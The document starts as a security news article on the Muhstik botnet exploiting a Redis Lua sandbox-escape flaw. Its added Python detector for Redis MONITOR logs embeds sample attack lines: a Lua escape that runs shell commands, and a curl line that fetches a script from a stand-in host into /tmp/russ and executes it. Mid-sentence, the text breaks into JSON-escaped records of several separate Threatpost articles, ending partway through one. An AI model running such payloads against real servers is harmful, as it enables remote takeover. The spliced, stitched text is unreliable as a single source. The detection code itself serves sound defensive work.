Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.
The vulnerability is [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that can be abused to achieve remote code execution on the underlying host. It carries the maximum CVSS score of 10.0. The bug is specific to the Debian-derived packaging of Redis (Debian and Ubuntu), not to upstream Redis: the distribution builds link Lua dynamically and leave the `package` library reachable from scripts, which is what lets an attacker who can run `EVAL` step outside the sandbox.
"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu noted in an advisory released last month.
According to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, attacks leveraging the new flaw commenced on March 11, 2022. The exploit retrieves a malicious shell script ("russia.sh") from a remote server (106[.]246.224.219) using wget or curl, stores it as "/tmp/russ", and runs it; the script in turn fetches and executes the botnet binaries from a second server (160[.]16.58.163).
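The attack chain above starts with a Lua script handed to Redis over `EVAL` (or `SCRIPT LOAD`), so the Redis command stream is the natural place to catch it. The following detector, an added example rather than code from the article or from Juniper, parses Redis `MONITOR` output and flags scripts that reference the sandbox-escape primitives named in the linked write-up (`package.loadlib` pulling `luaopen_io` out of liblua, then `io.popen`/`os.execute`) or the dropper strings reported for this campaign (`russia.sh`, `/tmp/russ`). The `MONITOR` line format is Redis's real one; the sample lines, client addresses, URL and paths are constructed for the demonstration.

```python
"""Flag Lua sandbox-escape attempts (CVE-2022-0543 style) in Redis MONITOR output.

Added example; the sample lines, addresses and URLs below are constructed.
"""
import re
from dataclasses import dataclass

# Real MONITOR line shape: <unix-ts> [<db> <client-addr>] "ARG" "ARG" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
QUOTED_ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Lua primitives that never belong in a script sent to Redis. The public write-up
# uses package.loadlib() to pull luaopen_io out of the dynamically linked liblua
# and io.popen() to run commands; os.execute is the other obvious exit.
SANDBOX_ESCAPE_MARKERS = ("package.loadlib", "luaopen_", "io.popen", "os.execute")

# Strings tied to the Muhstik dropper described in the article.
DROPPER_MARKERS = ("russia.sh", "/tmp/russ", "wget ", "curl ")

_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "a": "\a", "b": "\b"}


@dataclass
class Finding:
    ts: float
    client: str
    command: str
    reasons: tuple
    script: str


def unescape(arg: str) -> str:
    """Undo the \\", \\\\, \\n and \\xHH escaping MONITOR applies to arguments."""
    def repl(m):
        if m.group(1) is not None:            # \xHH
            return chr(int(m.group(1), 16))
        c = m.group(2)
        return _SIMPLE_ESCAPES.get(c, c)      # \n, \t, ... or the literal char
    return re.sub(r'\\(?:x([0-9a-fA-F]{2})|(.))', repl, arg)


def parse_args(raw: str):
    """Split the quoted argument list of a MONITOR line into plain strings."""
    return [unescape(m.group(1)) for m in QUOTED_ARG_RE.finditer(raw)]


def lua_body(args):
    """Return the Lua script carried by the command, or None if it has none."""
    cmd = args[0].upper()
    if cmd == "EVAL" and len(args) > 1:
        return args[1]
    if cmd == "SCRIPT" and len(args) > 2 and args[1].upper() == "LOAD":
        return args[2]
    # EVALSHA carries only a hash: correlate it with the SCRIPT LOAD that preceded it.
    return None


def inspect_line(line: str):
    m = MONITOR_RE.match(line)
    if not m:
        return None
    args = parse_args(m.group("args"))
    if not args:
        return None
    body = lua_body(args)
    if body is None:
        return None
    lowered = body.lower()
    reasons = tuple(k for k in SANDBOX_ESCAPE_MARKERS + DROPPER_MARKERS if k in lowered)
    if not reasons:
        return None
    return Finding(float(m.group("ts")), m.group("client"), args[0].upper(), reasons, body)


def scan(lines):
    """Run inspect_line over an iterable of MONITOR lines and keep the hits."""
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample: one benign EVAL, one sandbox escape, one dropper via SCRIPT LOAD.
SAMPLE_MONITOR = [
    r'1646992800.000100 [0 10.0.0.8:40120] "SET" "session:42" "ok"',
    r'1646992800.000300 [0 10.0.0.8:40120] "EVAL" "return redis.call(\"incr\", KEYS[1])" "1" "counter"',
    r'1646992801.120000 [0 198.51.100.23:51234] "EVAL" "local f = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = f(); return io.popen(\"id\"):read(\"*a\")" "0"',
    r'1646992802.500000 [0 198.51.100.23:51234] "SCRIPT" "LOAD" "os.execute(\"curl -o /tmp/russ http://203.0.113.10/russia.sh; sh /tmp/russ\")"',
    r'1646992803.000000 [0 198.51.100.23:51234] "EVALSHA" "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" "0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_MONITOR):
        print(f"{f.ts:.3f} {f.client} {f.command} {','.join(f.reasons)}")
```

`MONITOR` is costly on a busy instance, so in production feed the same parser from a short sampling window, a proxy, or a packet capture rather than leaving `MONITOR` attached. Any hit from a client that is not one of your application hosts also means the instance is reachable without authentication, which is a problem independent of this CVE.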
First [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik has been [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized through coin mining and distributed denial-of-service (DDoS) attacks.
Capable of self-propagating on Linux servers and IoT devices such as GPON home routers, DD-WRT routers, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has weaponized a number of flaws over the years –
* [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
* [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) – Drupal remote code execution vulnerability
* [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability
* [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and
* [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell)
"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force," Juniper Threat Labs researchers said in a report published last week.
In light of active exploitation of the critical security flaw, users are strongly advised to update their Redis installations to the patched Debian or Ubuntu package without delay. Because the flaw is only reachable by a client that can send Lua scripts, the usual Redis hardening also cuts off this attack: do not expose Redis to the internet, require authentication (`requirepass` or Redis 6+ ACLs), and deny the `@scripting` ACL category to clients that do not need `EVAL`.
the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). 
Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that its initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procedures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administrators should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. 
\u201cIf you\u2019re running a web-accessible WebLogic server that hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux 
service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Networks\u2019 Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. 
The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to a remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers 
said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. 
Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. 
\u201cAs in other families of malware, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader payload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. 
It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding an authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. 
[Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. 
\u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d a Make-A-Wish spokesperson told Threatpost. 
\u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining as a legitimate source of income but whose ability to secure their website might also be limited, putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. 
According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. 
Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. 
Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. 
The Drupal bug in question has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites running outdated and vulnerable versions of the Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including those of Lenovo, UCLA, and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. 
